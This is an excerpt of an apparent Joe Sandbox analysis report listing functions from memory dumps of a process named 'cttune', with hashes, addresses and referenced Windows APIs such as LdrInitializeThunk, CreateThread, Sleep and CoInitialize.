Memory Dump Source

Source File: 0000000B.00000002.3290150361.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true

Associated: 0000000B.00000002.3290150361.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4a40000_cttune.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 03503cb0cf694b966124a52fd20dd1821e80c5f5c392a714c42c3770c24fc8fb
Instruction ID: 32c57df7b7d6148d7c0d5ea540b1ef8c008f16731a6adb97dc7e8e73bc9b68de
Opcode Fuzzy Hash: 03503cb0cf694b966124a52fd20dd1821e80c5f5c392a714c42c3770c24fc8fb
Instruction Fuzzy Hash: 7D900261601500426180715948044066005ABE13063D6C11DA0555560C861DD9559269

Function 04AB4340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04AB434A

Memory Dump Source

Source File: 0000000B.00000002.3290150361.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true

Associated: 0000000B.00000002.3290150361.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4a40000_cttune.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 48733b00d247362d0eaf720f862e3c234963a765e1f1fc85cbd34d8672d151c7
Instruction ID: 4e7f58594b8e343c357276fe155b5f1c907f917bda0e24f5bd394a204e7eae7b
Opcode Fuzzy Hash: 48733b00d247362d0eaf720f862e3c234963a765e1f1fc85cbd34d8672d151c7
Instruction Fuzzy Hash: B990023160580012B180715948845464005ABE0306B96C019E0425554C8A19DA565361

Function 04AB2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04AB2CAA

Memory Dump Source

Source File: 0000000B.00000002.3290150361.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true

Associated: 0000000B.00000002.3290150361.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4a40000_cttune.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 93b9860cd5bca99e1fe062c61e5215b69c842662b1b03398d719d53b179a7deb
Instruction ID: d46aa6fd54381c7cd36ff12c1f1133170ddc36fd198b5bd5b1112afcbbe2477b
Opcode Fuzzy Hash: 93b9860cd5bca99e1fe062c61e5215b69c842662b1b03398d719d53b179a7deb
Instruction Fuzzy Hash: FA90023120140402F1407599540864600059BE0306F96D019A5025555EC66AD9916131

Function 04AB2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04AB2C6A

Memory Dump Source

Source File: 0000000B.00000002.3290150361.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true

Associated: 0000000B.00000002.3290150361.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4a40000_cttune.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 109ecbf736221171dd35bf262b4410319162c72c09bb7fc374d5d89aa12920c2
Instruction ID: 5e66d51a5b17b710e89c22330af4758a8d0597d494907d8f38336dd63b365746
Opcode Fuzzy Hash: 109ecbf736221171dd35bf262b4410319162c72c09bb7fc374d5d89aa12920c2
Instruction Fuzzy Hash: 5390023120140842F14071594404B4600059BE0306F96C01EA0125654D861AD9517521

Function 04AB2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04AB2C7A

Memory Dump Source

Source File: 0000000B.00000002.3290150361.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true

Associated: 0000000B.00000002.3290150361.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4a40000_cttune.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9eadb3f142c6845388e8a3c5699bc9465a7f6d93a77081e6cf780b6d0664846a
Instruction ID: 0558e6d8ee77a354613dd2373f4f09557ab749c9613acbaa04b00d2076ede5c6
Opcode Fuzzy Hash: 9eadb3f142c6845388e8a3c5699bc9465a7f6d93a77081e6cf780b6d0664846a
Instruction Fuzzy Hash: 2690023120148802F1507159840474A00059BD0306F9AC419A4425658D869AD9917121

Function 04AB2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04AB2DFA

Memory Dump Source

Source File: 0000000B.00000002.3290150361.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true

Associated: 0000000B.00000002.3290150361.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4a40000_cttune.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4d8885478d695ab81bb4f49cf5173b143a2791e3feaf9d1e74f0c2084e1f7fe7
Instruction ID: da5fb2ab5cf0737c35b33faac5bc5d8dfec6fe37fa9b9d072e222bb8544c6f92
Opcode Fuzzy Hash: 4d8885478d695ab81bb4f49cf5173b143a2791e3feaf9d1e74f0c2084e1f7fe7
Instruction Fuzzy Hash: 3590023120140413F1517159450470700099BD0246FD6C41AA0425558D965BDA52A121

Function 04AB2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04AB2DDA

Memory Dump Source

Source File: 0000000B.00000002.3290150361.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true

Associated: 0000000B.00000002.3290150361.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4a40000_cttune.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6e139fa74f73ae272d9098b48c0bebf4aadd5d588bb7fafb6a32820f9bc1fa75
Instruction ID: 14fac668c5500340183bb159b7ff98a20293f253c1d8e541fd584966716eba01
Opcode Fuzzy Hash: 6e139fa74f73ae272d9098b48c0bebf4aadd5d588bb7fafb6a32820f9bc1fa75
Instruction Fuzzy Hash: 9C900221242441527585B15944045074006ABE02467D6C01AA1415950C852BE956D621

Function 04AB2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04AB2D3A

Memory Dump Source

Source File: 0000000B.00000002.3290150361.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true

Associated: 0000000B.00000002.3290150361.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4a40000_cttune.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fb8c52745ffb2383c62b79b373530b4dd1bf57840cc1bf9f75a9b310ebc80503
Instruction ID: 1b65b91fafb24352c2690ef2246ad7aba486732d433ca6f3098d5082f6b9c9e4
Opcode Fuzzy Hash: fb8c52745ffb2383c62b79b373530b4dd1bf57840cc1bf9f75a9b310ebc80503
Instruction Fuzzy Hash: E090022130140003F180715954186064005EBE1306F96D019E0415554CD91AD9565222

Function 04AB2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04AB2D1A

Memory Dump Source

Source File: 0000000B.00000002.3290150361.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true

Associated: 0000000B.00000002.3290150361.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4a40000_cttune.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b4838e7f239a5fabf0b02566bbb26323a5a68cbd88dbc7f0b659c0d4a0a2288c
Instruction ID: 0ab0dc77a6fcc71e76d3cc81457302710f829ca90206605bc3a4b1c4dd3598b4
Opcode Fuzzy Hash: b4838e7f239a5fabf0b02566bbb26323a5a68cbd88dbc7f0b659c0d4a0a2288c
Instruction Fuzzy Hash: C690022921340002F1C07159540860A00059BD1207FD6D41DA0016558CC91AD9695321

Function 04AB2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04AB2E8A

Memory Dump Source

Source File: 0000000B.00000002.3290150361.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true

Associated: 0000000B.00000002.3290150361.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4a40000_cttune.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: aa75ee4f69bfc0d9c9e608517a016fe225f5580e140e4fd47ec7a3a4e5f38853
Instruction ID: ec5b4899ed5fb5a0e02201b6ff651d37cd465afbe8609e577e538f5ee7a3e10c
Opcode Fuzzy Hash: aa75ee4f69bfc0d9c9e608517a016fe225f5580e140e4fd47ec7a3a4e5f38853
Instruction Fuzzy Hash: 2090022160140502F14171594404616000A9BD0246FD6C02AA1025555ECA2ADA92A131

Function 04AB2EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04AB2EEA

Memory Dump Source

Source File: 0000000B.00000002.3290150361.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true

Associated: 0000000B.00000002.3290150361.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4a40000_cttune.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2470e7c1fa668c8f8d31a72e60b0f78a00755d8ca7ba99b2de6bdfdb50d3135a
Instruction ID: bf20dbc49be419e60fbaa3fdb9675e031281780d57d986695554afff094b2415
Opcode Fuzzy Hash: 2470e7c1fa668c8f8d31a72e60b0f78a00755d8ca7ba99b2de6bdfdb50d3135a
Instruction Fuzzy Hash: 0E90026120180403F1807559480460700059BD0307F96C019A2065555E8A2EDD516135

Function 04AB2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04AB2FBA

Memory Dump Source

Source File: 0000000B.00000002.3290150361.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true

Associated: 0000000B.00000002.3290150361.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4a40000_cttune.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dca20161fce250ff825b5a9842ed45680e00027b9843b66c5cd813b95bf64625
Instruction ID: faa87f21fceabee25a87ef06ff1e880cb050a53f0b2856c101bb604721a5f567
Opcode Fuzzy Hash: dca20161fce250ff825b5a9842ed45680e00027b9843b66c5cd813b95bf64625
Instruction Fuzzy Hash: 93900221601400426180716988449064005BFE1216796C129A0999550D855ED9655665

Function 04AB2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04AB2FEA

Memory Dump Source

Source File: 0000000B.00000002.3290150361.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true

Associated: 0000000B.00000002.3290150361.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4a40000_cttune.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c1028f55cffdba244899090245ba85059a876bd3933fa1bca735169b349138a9
Instruction ID: cc97a96a12db24a166e72dd527ed2fc1bad60bfcea9bc1ca5020785af934afff
Opcode Fuzzy Hash: c1028f55cffdba244899090245ba85059a876bd3933fa1bca735169b349138a9
Instruction Fuzzy Hash: 84900221211C0042F24075694C14B0700059BD0307F96C11DA0155554CC91AD9615521

Function 04AB2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04AB2F3A

Memory Dump Source

Source File: 0000000B.00000002.3290150361.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true

Associated: 0000000B.00000002.3290150361.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4a40000_cttune.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4a453bf6efcfb4b88204dd22a87852c09d1f0be02213aded48b6a38ec0e00a99
Instruction ID: f6deffefdd54a22714f5d77bb6ca6c3ea92b6727731b1574c098e70af82adc1f
Opcode Fuzzy Hash: 4a453bf6efcfb4b88204dd22a87852c09d1f0be02213aded48b6a38ec0e00a99
Instruction Fuzzy Hash: 9F90026134140442F14071594414B060005DBE1306F96C01DE1065554D861EDD526126

Function 04AB39B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04AB39BA

Memory Dump Source

Source File: 0000000B.00000002.3290150361.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true

Associated: 0000000B.00000002.3290150361.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4a40000_cttune.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5d613e83cb0649e3dea56be14057997c6b6739face399fc762c8a8964aa2a272
Instruction ID: 30b5bd5d46d804c4ced54472792a4446c0b35a248ef637b52f5be68476b735b9
Opcode Fuzzy Hash: 5d613e83cb0649e3dea56be14057997c6b6739face399fc762c8a8964aa2a272
Instruction Fuzzy Hash: B590022124545102F190715D44046164005BBE0206F96C029A0815594D855AD9556221

Function 04AB2AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04AB2AFA

Memory Dump Source

Source File: 0000000B.00000002.3290150361.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true

Associated: 0000000B.00000002.3290150361.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4a40000_cttune.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f3ff940fff2cd660b0dfd88f58b2aed07ee6ff0421d4fe6c49491c9377bba0ed
Instruction ID: 3a9681ea919b522816d9935bbc0bc57b24b79b0f6d4bf83e445c346c4e3cb596
Opcode Fuzzy Hash: f3ff940fff2cd660b0dfd88f58b2aed07ee6ff0421d4fe6c49491c9377bba0ed
Instruction Fuzzy Hash: 70900225221400022185B559060450B0445ABD63563D6C01DF1417590CC626D9655321

Function 04AB2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04AB2ADA

Memory Dump Source

Source File: 0000000B.00000002.3290150361.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true

Associated: 0000000B.00000002.3290150361.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4a40000_cttune.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6ec976d5590c723e8797194380fee1dd3b263b92471616af60d810578b8838be
Instruction ID: 31c432244e81023ccaa9ce48c3dec0b6bc41ed70f810be65f024820decef1205
Opcode Fuzzy Hash: 6ec976d5590c723e8797194380fee1dd3b263b92471616af60d810578b8838be
Instruction Fuzzy Hash: 97900225211400032145B559070450700469BD5356396C029F1016550CD626D9615121

Function 04AB2BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04AB2BAA

Memory Dump Source

Source File: 0000000B.00000002.3290150361.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true

Associated: 0000000B.00000002.3290150361.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4a40000_cttune.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 08f7f2d6e6819ba791ec4d6a324940a17c7db883c159685a3980e995bdc8d57b
Instruction ID: 4452d861eb5ebeb0ce3be0e449061c92da5b2691d99bda311d2f65ce9a5ca1b5
Opcode Fuzzy Hash: 08f7f2d6e6819ba791ec4d6a324940a17c7db883c159685a3980e995bdc8d57b
Instruction Fuzzy Hash: 4990023160540802F1907159441474600059BD0306F96C019A0025654D875ADB5576A1

Function 04AB2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04AB2BEA

Memory Dump Source

Source File: 0000000B.00000002.3290150361.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true

Associated: 0000000B.00000002.3290150361.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4a40000_cttune.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 348daad74ae580a37320ce66b8d8192897e9e881c524cef5cc8fe8819f569ec1
Instruction ID: 0edd1a5946e95962840440b2e32e61d3a937847640d42471b7c896fc145fe671
Opcode Fuzzy Hash: 348daad74ae580a37320ce66b8d8192897e9e881c524cef5cc8fe8819f569ec1
Instruction Fuzzy Hash: BA90023120544842F18071594404A4600159BD030AF96C019A0065694D962ADE55B661

Function 04AB2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04AB2BFA

Memory Dump Source

Source File: 0000000B.00000002.3290150361.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true

Associated: 0000000B.00000002.3290150361.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4a40000_cttune.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 49b11c0dfc26bf24c5021f5253d30c4eb0444dcd3186db63cd8b833e073522e8
Instruction ID: db999bff6eb1012a43a0f8e5ca5b6da1547f9556ab8b38058c2d9e7733bd3c84
Opcode Fuzzy Hash: 49b11c0dfc26bf24c5021f5253d30c4eb0444dcd3186db63cd8b833e073522e8
Instruction Fuzzy Hash: EA90023120140802F1C07159440464A00059BD1306FD6C01DA0026654DCA1ADB5977A1

Function 04AB2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04AB2B6A

Memory Dump Source

Source File: 0000000B.00000002.3290150361.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true

Associated: 0000000B.00000002.3290150361.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4a40000_cttune.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5b24a3201ad0410a2e4154e3b7b733726f1d3ae5a62585cfa66426deea33503e
Instruction ID: 4b4e4dca58dfa4ec075e6f85934f9afad4761f8c400b41dc5cb6e5c8baa25951
Opcode Fuzzy Hash: 5b24a3201ad0410a2e4154e3b7b733726f1d3ae5a62585cfa66426deea33503e
Instruction Fuzzy Hash: 8190026120240003614571594414616400A9BE0206B96C029E1015590DC52AD9916125

Function 00A79DE6 Relevance: 64.9, APIs: 1, Strings: 36, Instructions: 174
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00A79DD5

Strings

I, xrefs: 00A7A171
/, xrefs: 00A7A07D
H, xrefs: 00A7A026
t, xrefs: 00A7A1C4
7, xrefs: 00A7A16A
o , xrefs: 00A7A109
J[, xrefs: 00A79F99
], xrefs: 00A7A0AF
PB, xrefs: 00A79F1C
7, xrefs: 00A7A1E2
CU, xrefs: 00A79E2F
`{, xrefs: 00A79F5F
S:, xrefs: 00A79E61
G0, xrefs: 00A79F12
hY, xrefs: 00A79FD6
'c, xrefs: 00A79EA7
K^, xrefs: 00A7A062
NM, xrefs: 00A79F26
M, xrefs: 00A7A0A5
3f, xrefs: 00A7A17F
`, xrefs: 00A7A13A
z, xrefs: 00A7A073
uG, xrefs: 00A79EC5
d\, xrefs: 00A79F92
CH, xrefs: 00A7A117
(, xrefs: 00A7A110
3, xrefs: 00A7A008
87, xrefs: 00A79F08
V, xrefs: 00A7A155
^D, xrefs: 00A79FFE
zX, xrefs: 00A79FA7
;Z, xrefs: 00A79E57
uV, xrefs: 00A7A189
T, xrefs: 00A7A1A6
u, xrefs: 00A7A03A
cz, xrefs: 00A79F69

Memory Dump Source

Source File: 0000000B.00000002.3288064284.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a70000_cttune.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID: `$'c$/$3$3f$7$7$87$;Z$CH$CU$G0$H$I$J[$K^$M$NM$PB$S:$T$V$]$^D$`{$cz$d\$hY$o $t$u$uG$uV$z$zX$(
API String ID: 2422867632-2759518389
Opcode ID: 2808f62ed68ed8b6eb0ac44ae70336bdb2c80daeaf3eada904da8235f0373108
Instruction ID: cd8a78e43ad88f624ec66afe7b55d2274125fab638291b332b55f8507bcd8f6d
Opcode Fuzzy Hash: 2808f62ed68ed8b6eb0ac44ae70336bdb2c80daeaf3eada904da8235f0373108
Instruction Fuzzy Hash: 17B168B0D056689BEB608F41CD98BCEBBB5BB41308F5085C9D14C3B281C7FA1A89CF95

Function 00A93C60 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 00A93D3B

Strings

net.dll, xrefs: 00A93CF7, 00A93D86, 00A93D66, 00A93D72, 00A93D92
wininet.dll, xrefs: 00A93CCE, 00A93CDA

Memory Dump Source

Source File: 0000000B.00000002.3288064284.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a70000_cttune.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 77a6ef5de621deef47d6b3d9df9aded06e3c7665d00ce31998ac501a613751ac
Instruction ID: b5bbd23faf9f2aa71f22a382486ed9a78562982e57ac99a4e1d5d2a972f0f702
Opcode Fuzzy Hash: 77a6ef5de621deef47d6b3d9df9aded06e3c7665d00ce31998ac501a613751ac
Instruction Fuzzy Hash: BA319DB1600605BBDB14DFA0CC80FEAB7B8BB88704F10851DBA19AB241D7706A41CBA0

Function 00A8F729 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 102COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00A8F747
CoUninitialize.COMBASE ref: 00A8F82E

Strings

@J7<, xrefs: 00A8F75B

Memory Dump Source

Source File: 0000000B.00000002.3288064284.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a70000_cttune.jbxd

Yara matches

Similarity

API ID: InitializeUninitialize
String ID: @J7<
API String ID: 3442037557-2016760708
Opcode ID: 97d2ebd5e9d3ea318f158fe53a5184d2dc1f492f02d70f539e5593e8ec5c201a
Instruction ID: dbfb7211da114e7ffbf51efced02d9801507782a7cb6ecb6e144740802595007
Opcode Fuzzy Hash: 97d2ebd5e9d3ea318f158fe53a5184d2dc1f492f02d70f539e5593e8ec5c201a
